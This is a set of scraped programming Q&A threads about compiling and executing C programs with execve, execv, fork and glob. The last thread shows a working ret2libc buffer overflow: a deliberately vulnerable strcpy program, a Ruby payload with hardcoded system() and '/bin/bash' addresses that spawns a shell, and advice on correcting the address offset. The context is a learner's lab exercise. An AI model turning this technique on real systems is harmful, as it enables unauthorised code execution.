Sir, I have a simple code.
#include <unistd.h>
int main()
{
char *argv[2];
argv[0] = "/usr/bin/env";
argv[1] = NULL;
execve("/usr/bin/env", argv, NULL);
return 0 ;
}
I build it with gcc -O0 test.c and try to use gdb to debug a.out. And I found that if I first type r to run it is starting program a.out, but when I type r again, the program is replaced by /usr/bin/env, I don't know whether it is a bug or feature.
Related
The code is given below.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main ( int argc, char *argv[] )
{
//FILE *fps;
char secret[512] =" ";
FILE *fps = fopen("/etc/comp2700/share/secret", "r");
if(fps == NULL)
{
printf("Secret file not found\n");
return 1;
}
fgets(secret, 512, fps);
printf("Secret: %s\n", secret);
fclose(fps);
return 0;
}
When I am trying to run this program it is repeatedly throwing the following error:
./attack1.c: line 4: syntax error near unexpected token `('
./attack1.c: line 4: `int main ( int argc, char *argv[] )'
You need to compile your source file with gcc as follows
gcc -o attack attack1.c
then run it with
./attack
You should read up on the difference between compiled versus interpreted languages.
There is a short video here explaining the difference.
You cannot run your C program from the command line as ./attack1.c. Normally the shell would refuse to execute the C source file because it should not have execute permission, but for some reason, on your system, it must have the x bits and is read by the default shell as a script.
Of course this fails because attack1.c contains C code, not a command file. Note that the #include lines are interpreted as comments by the shell and the error only occurs at line 4.
To run a C program, you must first compile it to produce an executable:
gcc -Wall -o attack1 attack1.c
And then run the executable if there were no compilation errors:
./attack1
You can combine these commands as
gcc -Wall -o attack1 attack1.c && ./attack1
First, you need to compile the attack.c code using the following command:
gcc attack.c
This will create one executable file a.out which you can run using the following command:
./a.out
Hope this helps you.
I am writing a program using execv() that compiles and runs another program. I've written up a simple C program named helloWorld.c that when executed outputs, "Hello world," and a second file named testExec.c that is supposed to compile and run helloWorld.c. I've been looking around everywhere to find a way to do this, but I haven't found any answers. The code in testExec.c is:
#include <stdio.h>
#include <unistd.h>
int main(){
char *args[] = {"./hellWorld.c", "./a.out", NULL};
execv("usr/bin/cc", args);
return 0;
}
testExec.c compiles with no errors. However, when I run it I get an error that says, "fatal error: -fuse-linker-plugin, but liblto_plugin.so not found. compilation terminated." Which I think means helloWorld.c is being compiled but when it comes time to run helloWorld.c this error is thrown. I thought maybe that was because I had a.out and helloWorld.c prefaced with './'. I removed './' from both, then either one individually, and still no luck.
I also did 'sudo apt-get install build-essential' along with 'sudo apt-get install gcc'. I wasn't sure if that would resolve the issue but I really wasn't sure what else to try. Anyway, any help would be appreciated!
You're missing the leading slash when calling cc.
Also, the first argument in the argument list is the name of the executable. The actual arguments come after that. You're also not using -o to specify the name of the output file.
#include <stdio.h>
#include <unistd.h>
int main(){
char *args[] = {"cc", "-o", "./a.out", "./hellWorld.c", NULL};
execv("/usr/bin/cc", args);
return 0;
}
EDIT:
The above only compiles. If you want to compile and run, you can do this:
#include <stdio.h>
#include <unistd.h>
int main(){
system("cc -o ./a.out ./hellWorld.c");
execl("./a.out", "a.out", NULL);
return 0;
}
Although this is probably best done as a shell script:
#!/bin/sh
cc -o ./a.out ./hellWorld.c
./a.out
I have to program a shell in C and need to handle globing in it and I am only allowed to use the function glob. But when I try to use it, it only gives me one result back.
#include <glob.h>
#include <stdlib.h>
int main(int ac, char **av)
{
glob_t s;
unsigned long i = -1;
if (glob(av[1], 0, NULL, &s))
printf("ERROR !\n");
else
while (++i < s.gl_pathc)
printf("%s\n", s.gl_pathv[i]);
return (0);
}
I run this code in a folder where there is two C files : replace_glob.c and test.c
And when I run this code :
$ ./a.out *.c
replace_glob.c
$
I dont understand why and I would really appreciate your help
In the command line
./a.out *.c
the shell expands the glob pattern, so your program sees
{"./a.out", "replace_glob.c", "test.c", NULL}
as its argv. You need to quote the pattern for the program to see it:
./a.out '*.c'
I want to execute a C program in Linux using fork and exec system calls.
I have written a program msg.c and it's working fine. Then I wrote a program msg1.c.
When I do ./a.out msg.c, it's just printing msg.c as output but not executing my program.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h> /* for fork */
#include <sys/types.h> /* for pid_t */
#include <sys/wait.h> /* for wait */
int main(int argc,char** argv)
{
/*Spawn a child to run the program.*/
pid_t pid=fork();
if (pid==0)
{ /* child process */
// static char *argv[]={"echo","Foo is my name.",NULL};
execv("/bin/echo",argv);
exit(127); /* only if execv fails */
}
else
{ /* pid!=0; parent process */
waitpid(pid,0,0); /* wait for child to exit */
}
return 0;
}
argv[0] contains your program's name and you are Echo'ing it.
Works flawlessly ;-)
/bin/echo msg.c will print msg.c as output if you need to execute your msg binary then you need to change your code to execv("path/msg");
your exec executes the program echo which prints out whatever argv's value is;
furthermore you cannot "execute" msg.c if it is a sourcefile, you have to compile (gcc msg.c -o msg) it first, and then call something like exec("msg")
C programs are not executables (unless you use an uncommon C interpreter).
You need to compile them first with a compiler like GCC, so compile your msg.c source file into a msg-prog executable (using -Wall to get all warnings and -g to get debugging info from the gcc compiler) with:
gcc -Wall -g msg.c -o msg-prog
Take care to improve the msg.c till you get no warnings.
Then, you might want to replace your execv in your source code with something more sensible. Read execve(2) and execl(3) and perror(3). Consider using
execl ("./msg-prog", "msg-prog", "Foo is my name", NULL);
perror ("execl failed");
exit (127);
Read Advanced Linux Programming.
NB: You might name your executable just msg instead of msg-prog ....
I am learning about ret2libc buffer overflow exploits to bypass NX.
My vulnerable code (vuln.c):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[512];
if (argc != 2)
printf("NO\n");
else {
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
}
Compiled with this command: # gcc -o vuln vuln.c
I then created this simple ret2libc exploit in ruby (exploit.rb):
p = "A"*524
p += [0xb7e9ef10].pack('<I') # system()
p += [0xb7e79e46].pack('<I') # nomal ret val
p += [0xbffff75a].pack('<I') # "/bin/bash"
print(p)
If it run it in gdb with (gdb) r $(ruby exploit.rb) it gives me a nice bash shell.
I then try to run it in a normal shell with # ./vuln $(ruby exploit.rb), but instead of giving me a shell it gives me this instead: sh: 1: g:0:1: not found
ASLR is disabled and the only protection enabled is NX, I think.
Any help is appreciated.
Edit:
I am running this on i686 in case that helps.
The reason for shifting is the execution environment.
user#feynman:~$ ./getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff82
user#feynman:~$ /home/user/getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff70
Here the way of launching getenv is affecting address of the PWN.
You achieved code execution but the address of the SHELL env var is off. Try [address of shell in gdb] + 4, or in gdb, x/s 0xbffff75a+4.